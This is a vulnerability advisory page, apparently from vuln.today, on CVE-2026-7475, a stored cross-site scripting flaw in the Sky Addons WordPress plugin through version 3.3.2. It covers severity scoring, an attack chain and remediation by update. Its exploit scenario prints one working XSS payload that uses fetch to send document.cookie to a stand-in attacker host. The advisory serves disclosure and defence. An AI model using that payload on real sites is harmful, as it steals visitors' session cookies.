Skip to main content

Sky Addons EUVD-2026-28543

| CVE-2026-7475 MEDIUM
Cross-site Scripting (XSS) (CWE-79)
2026-05-08 Wordfence GHSA-59rm-h9h8-h9gh
6.4
CVSS 3.1 · NVD
Share

Severity by source

NVD PRIMARY
6.4 MEDIUM
AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N

Primary rating from NVD · only source for this CVE.

CVSS VectorNVD

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
None
Scope
Changed
Confidentiality
Low
Integrity
Low
Availability
None

Lifecycle Timeline

2
Analysis Generated
May 08, 2026 - 10:30 vuln.today
CVE Published
May 08, 2026 - 09:26 nvd
MEDIUM 6.4

DescriptionCVE.org

The Sky Addons plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the sky-custom-scripts custom post type in all versions up to, and including, 3.3.2. This is due to the custom post type being registered with capability_type => 'post' and show_in_rest => true, combined with insufficient input sanitization on the sky_script_content meta field and lack of output escaping when rendering scripts on the frontend. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts via the REST API that execute on every frontend page for all site visitors.

AnalysisAI

Stored cross-site scripting in Sky Addons plugin for WordPress (versions up to 3.3.2) allows authenticated attackers with Author-level access to inject arbitrary JavaScript via the REST API that persists in the sky-custom-scripts post type and executes on all frontend pages for every site visitor. The vulnerability stems from insufficient input sanitization on the sky_script_content meta field combined with lack of output escaping during frontend rendering. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Access
Obtain Author+ WordPress credentials
Delivery
Access REST API endpoint
Exploit
Craft malicious custom script POST
Execution
Store unescaped JavaScript in database
Persist
Frontend renders script on every page load
Impact
Arbitrary JavaScript executes in visitor browsers

Vulnerability AssessmentAI

Exploitation Exploitation requires an authenticated WordPress user account with Author-level access or higher role, combined with REST API access enabled (the default in modern WordPress). … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment CVSS score of 6.4 (Medium) with AV:N/AC:L/PR:L/UI:N/S:C reflects network-accessible exploitation requiring low-complexity, low-privilege (Author) authenticated access, with cross-site scope (injected script affects all users, not just the attacker). … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An attacker with legitimate Author credentials (obtained via phishing, credential stuffing, or supplied by a malicious contractor) uses the WordPress REST API to POST a new custom script post with `sky_script_content` set to `<img src=x onerror='fetch("https://attacker.com/log?cookie="+document.cookie)'>`. The plugin stores this unescaped meta value in the database. …
Remediation Update Sky Addons plugin to version 3.3.3 or later, which includes fixes visible in the trunk and 3.3.3 tag references (class-custom-scripts-data.php line 134 and class-custom-scripts-loader.php line 237 show corrected code). … Detailed patch versions, workarounds, and compensating controls in full report.

Threat intelligence, references, and detailed analysis are available after sign-in.

Share

EUVD-2026-28543 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy